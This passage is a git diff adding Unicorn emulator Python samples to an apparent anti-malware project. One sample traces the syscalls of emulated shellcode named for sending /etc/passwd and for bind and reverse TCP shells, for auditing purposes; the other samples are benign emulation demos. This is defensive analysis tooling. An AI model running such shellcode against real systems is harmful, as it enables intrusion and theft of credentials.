tracing Linux interrupt +def hook_intr(uc, intno, user_data): + global id_gen + + # only handle Linux syscall + if intno != 0x80: + return + + eax = uc.reg_read(UC_X86_REG_EAX) + ebx = uc.reg_read(UC_X86_REG_EBX) + ecx = uc.reg_read(UC_X86_REG_ECX) + edx = uc.reg_read(UC_X86_REG_EDX) + eip = uc.reg_read(UC_X86_REG_EIP) + + # print(">>> INTERRUPT %d" % eax) + + if eax == 1: # sys_exit + print(">>> SYS_EXIT") + uc.emu_stop() + elif eax == 3: # sys_read + fd = ebx + buf = ecx + count = edx + + dummy_content = str(uuid.uuid1()).encode("latin1")[:32] + if len(dummy_content) > count: + dummy_content = dummy_content[:count] + + uc.mem_write(buf, dummy_content) + + msg = "read %d bytes from fd(%d) with dummy_content(%s)" % (count, fd, dummy_content) + + fd_chains.add_log(fd, msg) + print(">>> %s" % msg) + elif eax == 4: # sys_write + fd = ebx + buf = ecx + count = edx + + content = uc.mem_read(buf, count) + + msg = "write data=%s count=%d to fd(%d)" % (content, count, fd) + + print(">>> %s" % msg) + fd_chains.add_log(fd, msg) + elif eax == 5: # sys_open + 
filename_addr = ebx + flags = ecx + mode = edx + filename = read_string(uc, filename_addr) + + dummy_fd = id_gen.next() + uc.reg_write(UC_X86_REG_EAX, dummy_fd) + + msg = "open file (filename=%s flags=%d mode=%d) with fd(%d)" % (filename, flags, mode, dummy_fd) + + fd_chains.create_chain(dummy_fd) + fd_chains.add_log(dummy_fd, msg) + print(">>> %s" % msg) + elif eax == 11: # sys_execv + # print(">>> ebx=0x%x, ecx=0x%x, edx=0x%x" % (ebx, ecx, edx)) + filename = read_string(uc, ebx) + + print(">>> SYS_EXECV filename=%s" % filename) + elif eax == 63: # sys_dup2 + fd_chains.link_fd(ecx, ebx) + print(">>> SYS_DUP2 oldfd=%d newfd=%d" % (ebx, ecx)) + elif eax == 102: # sys_socketcall + # ref: http://www.skyfree.org/linux/kernel_network/socket.html + call = uc.reg_read(UC_X86_REG_EBX) + args = uc.reg_read(UC_X86_REG_ECX) + + SOCKETCALL_NUM_ARGS = { + 1: 3, # sys_socket + 2: 3, # sys_bind + 3: 3, # sys_connect + 4: 2, # sys_listen + 5: 3, # sys_accept + 9: 4, # sys_send + 11: 4, # sys_receive + 13: 2 # sys_shutdown + } + + buf = uc.mem_read(args, SOCKETCALL_NUM_ARGS[call] * SIZE_REG) + args = struct.unpack("<" + "I" * SOCKETCALL_NUM_ARGS[call], buf) + + # int sys_socketcall(int call, unsigned long *args) + if call == 1: # sys_socket + # err = sys_socket(a0,a1,a[2]) + # int sys_socket(int family, int type, int protocol) + family = args[0] + sock_type = args[1] + protocol = args[2] + + dummy_fd = id_gen.next() + uc.reg_write(UC_X86_REG_EAX, dummy_fd) + + if family == 2: # AF_INET + + msg = "create socket (%s, %s) with fd(%d)" % (ADDR_FAMILY[family], SOCKET_TYPES[sock_type], dummy_fd) + fd_chains.create_chain(dummy_fd) + fd_chains.add_log(dummy_fd, msg) + print_sockcall(msg) + elif family == 3: # AF_INET6 + pass + + elif call == 2: # sys_bind + fd = args[0] + umyaddr = args[1] + addrlen = args[2] + + sock_addr = uc.mem_read(umyaddr, addrlen) + + msg = "fd(%d) bind to %s" % (fd, parse_sock_address(sock_addr)) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + elif call == 
3: # sys_connect + # err = sys_connect(a0, (struct sockaddr *)a1, a[2]) + # int sys_connect(int fd, struct sockaddr *uservaddr, int addrlen) + fd = args[0] + uservaddr = args[1] + addrlen = args[2] + + sock_addr = uc.mem_read(uservaddr, addrlen) + msg = "fd(%d) connect to %s" % (fd, parse_sock_address(sock_addr)) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + elif call == 4: # sys_listen + fd = args[0] + backlog = args[1] + + msg = "fd(%d) listened with backlog=%d" % (fd, backlog) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + elif call == 5: # sys_accept + fd = args[0] + upeer_sockaddr = args[1] + upeer_addrlen = args[2] + + # print(">>> upeer_sockaddr=0x%x, upeer_addrlen=%d" % (upeer_sockaddr, upeer_addrlen)) + + if upeer_sockaddr == 0x0: + print_sockcall("fd(%d) accept client" % fd) + else: + upeer_len, = struct.unpack("<I", uc.mem_read(upeer_addrlen, 4)) + + sock_addr = uc.mem_read(upeer_sockaddr, upeer_len) + + msg = "fd(%d) accept client with upeer=%s" % (fd, parse_sock_address(sock_addr)) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + elif call == 9: # sys_send + fd = args[0] + buff = args[1] + length = args[2] + flags = args[3] + + buf = uc.mem_read(buff, length) + msg = "fd(%d) send data=%s" % (fd, buf) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + elif call == 11: # sys_receive + fd = args[0] + ubuf = args[1] + size = args[2] + flags = args[3] + + msg = "fd(%d) is gonna receive data with size=%d flags=%d" % (fd, size, flags) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + elif call == 13: # sys_shutdown + fd = args[0] + how = args[1] + + msg = "fd(%d) is shutted down because of %d" % (fd, how) + fd_chains.add_log(fd, msg) + print_sockcall(msg) + + +# Test X86 32 bit +def test_i386(code): + global fd_chains + + fd_chains.clean() + print("Emulate i386 code") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) 
+ + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, code) + + # initialize stack + mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000) + + # tracing all instructions with customized callback + # mu.hook_add(UC_HOOK_CODE, hook_code) + + # handle interrupt ourself + mu.hook_add(UC_HOOK_INTR, hook_intr) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(code)) + + # now print out some registers + print(">>> Emulation done") + + except UcError as e: + print("ERROR: %s" % e) + + fd_chains.print_report() + + +# Globals +fd_chains = LogChain() +id_gen = IdGenerator() + +if __name__ == '__main__': + test_i386(X86_SEND_ETCPASSWD) + test_i386(X86_BIND_TCP) + test_i386(X86_REVERSE_TCP) + test_i386(X86_REVERSE_TCP_2) diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_sparc.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_sparc.py new file mode 100644 index 0000000..5dbe746 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_sparc.py @@ -0,0 +1,64 @@ +#!/usr/bin/env python +# Sample code for SPARC of Unicorn. 
Nguyen Anh Quynh <aquynh@gmail.com> +# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.sparc_const import * + + +# code to be emulated +SPARC_CODE = b"\x86\x00\x40\x02" # add %g1, %g2, %g3; +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + + +# Test SPARC +def test_sparc(): + print("Emulate SPARC code") + try: + # Initialize emulator in SPARC EB mode + mu = Uc(UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, SPARC_CODE) + + # initialize machine registers + mu.reg_write(UC_SPARC_REG_G1, 0x1230) + mu.reg_write(UC_SPARC_REG_G2, 0x6789) + mu.reg_write(UC_SPARC_REG_G3, 0x5555) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(SPARC_CODE)) + + # now print out some registers + print(">>> Emulation done. 
Below is the CPU context") + + g3 = mu.reg_read(UC_SPARC_REG_G3) + print(">>> G3 = 0x%x" %g3) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_sparc() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_x86.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_x86.py new file mode 100644 index 0000000..25d947c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/sample_x86.py @@ -0,0 +1,653 @@ +#!/usr/bin/env python +# Sample code for X86 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> + +from __future__ import print_function +from unicorn import * +from unicorn.x86_const import * +import pickle + +X86_CODE32 = b"\x41\x4a\x66\x0f\xef\xc1" # INC ecx; DEC edx; PXOR xmm0, xmm1 +X86_CODE32_LOOP = b"\x41\x4a\xeb\xfe" # INC ecx; DEC edx; JMP self-loop +X86_CODE32_JUMP = b"\xeb\x02\x90\x90\x90\x90\x90\x90" # jmp 4; nop; nop; nop; nop; nop; nop +X86_CODE32_JMP_INVALID = b"\xe9\xe9\xee\xee\xee\x41\x4a" # JMP outside; INC ecx; DEC edx +X86_CODE32_MEM_READ = b"\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx +X86_CODE32_MEM_WRITE = b"\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov [0xaaaaaaaa], ecx; INC ecx; DEC edx +X86_CODE64 = b"\x41\xBC\x3B\xB0\x28\x2A\x49\x0F\xC9\x90\x4D\x0F\xAD\xCF\x49\x87\xFD\x90\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9\x4D\x29\xF4\x49\x81\xC9\xF6\x8A\xC6\x53\x4D\x87\xED\x48\x0F\xAD\xD2\x49\xF7\xD4\x48\xF7\xE1\x4D\x19\xC5\x4D\x89\xC5\x48\xF7\xD6\x41\xB8\x4F\x8D\x6B\x59\x4D\x87\xD0\x68\x6A\x1E\x09\x3C\x59" +X86_CODE32_INOUT = b"\x41\xE4\x3F\x4a\xE6\x46\x43" # INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx +X86_CODE64_SYSCALL = b'\x0f\x05' # SYSCALL +X86_CODE16 = b'\x00\x00' # add byte ptr [bx + si], al + +# memory address where emulation starts +ADDRESS = 0x1000000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + 
+# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + eflags = uc.reg_read(UC_X86_REG_EFLAGS) + print(">>> --- EFLAGS is 0x%x" %eflags) + +def hook_code64(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + rip = uc.reg_read(UC_X86_REG_RIP) + print(">>> RIP is 0x%x" %rip); + + +# callback for tracing invalid memory access (READ or WRITE) +def hook_mem_invalid(uc, access, address, size, value, user_data): + if access == UC_MEM_WRITE_UNMAPPED: + print(">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" \ + %(address, size, value)) + # map this memory in with 2MB in size + uc.mem_map(0xaaaa0000, 2 * 1024*1024) + # return True to indicate we want to continue emulation + return True + else: + # return False to indicate we want to stop emulation + return False + + +# callback for tracing memory access (READ or WRITE) +def hook_mem_access(uc, access, address, size, value, user_data): + if access == UC_MEM_WRITE: + print(">>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" \ + %(address, size, value)) + else: # READ + print(">>> Memory is being READ at 0x%x, data size = %u" \ + %(address, size)) + + +# callback for IN instruction +def hook_in(uc, port, size, user_data): + eip = uc.reg_read(UC_X86_REG_EIP) + print("--- reading from port 0x%x, size: %u, address: 0x%x" %(port, size, eip)) + if size == 1: + # read 1 byte to AL + return 0xf1 + if size == 2: + # read 2 byte to AX + return 0xf2 + if size == 4: + # read 4 byte to EAX + return 0xf4 + # we should never reach here + return 0 + + +# callback for OUT instruction +def hook_out(uc, port, size, value, user_data): + eip = uc.reg_read(UC_X86_REG_EIP) + print("--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x" %(port, size, value, eip)) + + # confirm that value is indeed the value of 
AL/AX/EAX + v = 0 + if size == 1: + # read 1 byte in AL + v = uc.reg_read(UC_X86_REG_AL) + if size == 2: + # read 2 bytes in AX + v = uc.reg_read(UC_X86_REG_AX) + if size == 4: + # read 4 bytes in EAX + v = uc.reg_read(UC_X86_REG_EAX) + + print("--- register value = 0x%x" %v) + + +# Test X86 32 bit +def test_i386(): + print("Emulate i386 code") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + mu.reg_write(UC_X86_REG_XMM0, 0x000102030405060708090a0b0c0d0e0f) + mu.reg_write(UC_X86_REG_XMM1, 0x00102030405060708090a0b0c0d0e0f0) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32)) + + # now print out some registers + print(">>> Emulation done. 
Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + r_xmm0 = mu.reg_read(UC_X86_REG_XMM0) + print(">>> ECX = 0x%x" %r_ecx) + print(">>> EDX = 0x%x" %r_edx) + print(">>> XMM0 = 0x%.32x" %r_xmm0) + + # read from memory + tmp = mu.mem_read(ADDRESS, 4) + print(">>> Read 4 bytes from [0x%x] = 0x" %(ADDRESS), end="") + for i in reversed(tmp): + print("%x" %(i), end="") + print("") + + except UcError as e: + print("ERROR: %s" % e) + + +def test_i386_map_ptr(): + print("Emulate i386 code - use uc_mem_map_ptr()") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32), 2 * UC_SECOND_SCALE) + + # now print out some registers + print(">>> Emulation done. 
Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + print(">>> ECX = 0x%x" %r_ecx) + print(">>> EDX = 0x%x" %r_edx) + + # read from memory + tmp = mu.mem_read(ADDRESS, 4) + print(">>> Read 4 bytes from [0x%x] = 0x" %(ADDRESS), end="") + for i in reversed(tmp): + print("%x" %(i), end="") + print("") + + except UcError as e: + print("ERROR: %s" % e) + + +def test_i386_invalid_mem_read(): + print("Emulate i386 code that read from invalid memory") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_MEM_READ) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + try: + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_MEM_READ)) + except UcError as e: + print("Failed on uc_emu_start() with error returned 6: %s" % e) + + # now print out some registers + print(">>> Emulation done. 
Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + print(">>> ECX = 0x%x" %r_ecx) + print(">>> EDX = 0x%x" %r_edx) + + except UcError as e: + print("ERROR: %s" % e) + +def test_i386_jump(): + print("Emulate i386 code with jump") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_JUMP) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block, begin=ADDRESS, end=ADDRESS) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS) + + try: + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_JUMP)) + except UcError as e: + print("ERROR: %s" % e) + + print(">>> Emulation done. Below is the CPU context") + + except UcError as e: + print("ERROR: %s" % e) + + +def test_i386_invalid_mem_write(): + print("Emulate i386 code that write to invalid memory") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_MEM_WRITE) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # intercept invalid memory events + mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, hook_mem_invalid) + + try: + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_MEM_WRITE)) + except UcError as e: + print("ERROR: %s" % e) + 
+ # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + print(">>> ECX = 0x%x" %r_ecx) + print(">>> EDX = 0x%x" %r_edx) + + # read from memory + print(">>> Read 4 bytes from [0x%x] = 0x" %(0xaaaaaaaa), end="") + tmp = mu.mem_read(0xaaaaaaaa, 4) + for i in reversed(tmp): + if i != 0: + print("%x" %i, end="") + print("") + + try: + tmp = mu.mem_read(0xffffffaa, 4) + print(">>> Read 4 bytes from [0x%x] = 0x" %(0xffffffaa), end="") + for i in reversed(tmp): + print("%x" %i, end="") + print("") + + except UcError as e: + print(">>> Failed to read 4 bytes from [0xffffffaa]") + + except UcError as e: + print("ERROR: %s" % e) + +def test_i386_jump_invalid(): + print("Emulate i386 code that jumps to invalid memory") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_JMP_INVALID) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + try: + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_JMP_INVALID)) + except UcError as e: + print("Failed on uc_emu_start() with error returned 8: %s" %e) + + print(">>> Emulation done. 
Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + print(">>> ECX = 0x%x" %r_ecx) + print(">>> EDX = 0x%x" %r_edx) + + except UcError as e: + print("ERROR %s" % e) + +def test_i386_loop(): + print("Emulate i386 code that loop forever") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_LOOP) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_LOOP), timeout=2*UC_SECOND_SCALE) + + print(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + print(">>> ECX = 0x%x" %r_ecx) + print(">>> EDX = 0x%x" %r_edx) + + except UcError as e: + print("ERROR: %s" % e) + + +# Test X86 32 bit with IN/OUT instruction +def test_i386_inout(): + print("Emulate i386 code with IN/OUT instructions") + try: + # Initialize emulator in X86-32bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_INOUT) + + # initialize machine registers + mu.reg_write(UC_X86_REG_EAX, 0x1234) + mu.reg_write(UC_X86_REG_ECX, 0x6789) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # handle IN & OUT instruction + mu.hook_add(UC_HOOK_INSN, hook_in, None, 1, 0, UC_X86_INS_IN) + mu.hook_add(UC_HOOK_INSN, hook_out, None, 1, 0, UC_X86_INS_OUT) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32_INOUT)) + + # now print out some registers + print(">>> 
Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_eax = mu.reg_read(UC_X86_REG_EAX) + print(">>> EAX = 0x%x" %r_eax) + print(">>> ECX = 0x%x" %r_ecx) + except UcError as e: + print("ERROR: %s" % e) + + +def test_i386_context_save(): + print("Save/restore CPU context in opaque blob") + address = 0 + code = b'\x40' # inc eax + try: + # Initialize emulator + mu = Uc(UC_ARCH_X86, UC_MODE_32) + + # map 8KB memory for this emulation + mu.mem_map(address, 8 * 1024, UC_PROT_ALL) + + # write machine code to be emulated to memory + mu.mem_write(address, code) + + # set eax to 1 + mu.reg_write(UC_X86_REG_EAX, 1) + + print(">>> Running emulation for the first time") + mu.emu_start(address, address+1) + + print(">>> Emulation done. Below is the CPU context") + print(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) + print(">>> Saving CPU context") + saved_context = mu.context_save() + + print(">>> Pickling CPU context") + pickled_saved_context = pickle.dumps(saved_context) + + print(">>> Running emulation for the second time") + mu.emu_start(address, address+1) + print(">>> Emulation done. Below is the CPU context") + print(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) + + print(">>> Unpickling CPU context") + saved_context = pickle.loads(pickled_saved_context) + + print(">>> CPU context restored. 
Below is the CPU context") + mu.context_restore(saved_context) + print(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) + + except UcError as e: + print("ERROR: %s" % e) + +def test_x86_64(): + print("Emulate x86_64 code") + try: + # Initialize emulator in X86-64bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE64) + + # initialize machine registers + mu.reg_write(UC_X86_REG_RAX, 0x71f3029efd49d41d) + mu.reg_write(UC_X86_REG_RBX, 0xd87b45277f133ddb) + mu.reg_write(UC_X86_REG_RCX, 0xab40d1ffd8afc461) + mu.reg_write(UC_X86_REG_RDX, 0x919317b4a733f01) + mu.reg_write(UC_X86_REG_RSI, 0x4c24e753a17ea358) + mu.reg_write(UC_X86_REG_RDI, 0xe509a57d2571ce96) + mu.reg_write(UC_X86_REG_R8, 0xea5b108cc2b9ab1f) + mu.reg_write(UC_X86_REG_R9, 0x19ec097c8eb618c1) + mu.reg_write(UC_X86_REG_R10, 0xec45774f00c5f682) + mu.reg_write(UC_X86_REG_R11, 0xe17e9dbec8c074aa) + mu.reg_write(UC_X86_REG_R12, 0x80f86a8dc0f6d457) + mu.reg_write(UC_X86_REG_R13, 0x48288ca5671c5492) + mu.reg_write(UC_X86_REG_R14, 0x595f72f6e4017f6e) + mu.reg_write(UC_X86_REG_R15, 0x1efd97aea331cccc) + + # setup stack + mu.reg_write(UC_X86_REG_RSP, ADDRESS + 0x200000) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions in range [ADDRESS, ADDRESS+20] + mu.hook_add(UC_HOOK_CODE, hook_code64, None, ADDRESS, ADDRESS+20) + + # tracing all memory READ & WRITE access + mu.hook_add(UC_HOOK_MEM_WRITE, hook_mem_access) + mu.hook_add(UC_HOOK_MEM_READ, hook_mem_access) + # actually you can also use READ_WRITE to trace all memory access + #mu.hook_add(UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, hook_mem_access) + + try: + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE64)) + except UcError as e: + print("ERROR: %s" % e) + + # now print out some registers + print(">>> 
Emulation done. Below is the CPU context") + + rax = mu.reg_read(UC_X86_REG_RAX) + rbx = mu.reg_read(UC_X86_REG_RBX) + rcx = mu.reg_read(UC_X86_REG_RCX) + rdx = mu.reg_read(UC_X86_REG_RDX) + rsi = mu.reg_read(UC_X86_REG_RSI) + rdi = mu.reg_read(UC_X86_REG_RDI) + r8 = mu.reg_read(UC_X86_REG_R8) + r9 = mu.reg_read(UC_X86_REG_R9) + r10 = mu.reg_read(UC_X86_REG_R10) + r11 = mu.reg_read(UC_X86_REG_R11) + r12 = mu.reg_read(UC_X86_REG_R12) + r13 = mu.reg_read(UC_X86_REG_R13) + r14 = mu.reg_read(UC_X86_REG_R14) + r15 = mu.reg_read(UC_X86_REG_R15) + + print(">>> RAX = 0x%x" %rax) + print(">>> RBX = 0x%x" %rbx) + print(">>> RCX = 0x%x" %rcx) + print(">>> RDX = 0x%x" %rdx) + print(">>> RSI = 0x%x" %rsi) + print(">>> RDI = 0x%x" %rdi) + print(">>> R8 = 0x%x" %r8) + print(">>> R9 = 0x%x" %r9) + print(">>> R10 = 0x%x" %r10) + print(">>> R11 = 0x%x" %r11) + print(">>> R12 = 0x%x" %r12) + print(">>> R13 = 0x%x" %r13) + print(">>> R14 = 0x%x" %r14) + print(">>> R15 = 0x%x" %r15) + + + except UcError as e: + print("ERROR: %s" % e) + + +def test_x86_64_syscall(): + print("Emulate x86_64 code with 'syscall' instruction") + try: + # Initialize emulator in X86-64bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE64_SYSCALL) + + def hook_syscall(mu, user_data): + rax = mu.reg_read(UC_X86_REG_RAX) + if rax == 0x100: + mu.reg_write(UC_X86_REG_RAX, 0x200) + else: + print('ERROR: was not expecting rax=%d in syscall' % rax) + + # hook interrupts for syscall + mu.hook_add(UC_HOOK_INSN, hook_syscall, None, 1, 0, UC_X86_INS_SYSCALL) + + # syscall handler is expecting rax=0x100 + mu.reg_write(UC_X86_REG_RAX, 0x100) + + try: + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE64_SYSCALL)) + except UcError as e: + print("ERROR: %s" % e) + + # now print out some registers + print(">>> Emulation done. 
Below is the CPU context") + + rax = mu.reg_read(UC_X86_REG_RAX) + print(">>> RAX = 0x%x" % rax) + + except UcError as e: + print("ERROR: %s" % e) + + +def test_x86_16(): + print("Emulate x86 16-bit code") + try: + # Initialize emulator in X86-16bit mode + mu = Uc(UC_ARCH_X86, UC_MODE_16) + + # map 8KB memory for this emulation + mu.mem_map(0, 8 * 1024) + + # set CPU registers + mu.reg_write(UC_X86_REG_EAX, 7) + mu.reg_write(UC_X86_REG_EBX, 5) + mu.reg_write(UC_X86_REG_ESI, 6) + + # write machine code to be emulated to memory + mu.mem_write(0, X86_CODE16) + + # emulate machine code in infinite time + mu.emu_start(0, len(X86_CODE16)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + tmp = mu.mem_read(11, 1) + print(">>> Read 1 bytes from [0x%x] = 0x%x" %(11, tmp[0])) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_x86_16() + test_i386() + print("=" * 35) + test_i386_map_ptr() + print("=" * 35) + test_i386_inout() + print("=" * 35) + test_i386_context_save() + print("=" * 35) + test_i386_jump() + print("=" * 35) + test_i386_loop() + print("=" * 35) + test_i386_invalid_mem_read() + print("=" * 35) + test_i386_invalid_mem_write() + print("=" * 35) + test_i386_jump_invalid() + test_x86_64() + print("=" * 35) + test_x86_64_syscall() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/setup.cfg b/ai_anti_malware/unicorn/unicorn-master/bindings/python/setup.cfg new file mode 100644 index 0000000..3c6e79c --- /dev/null +++ 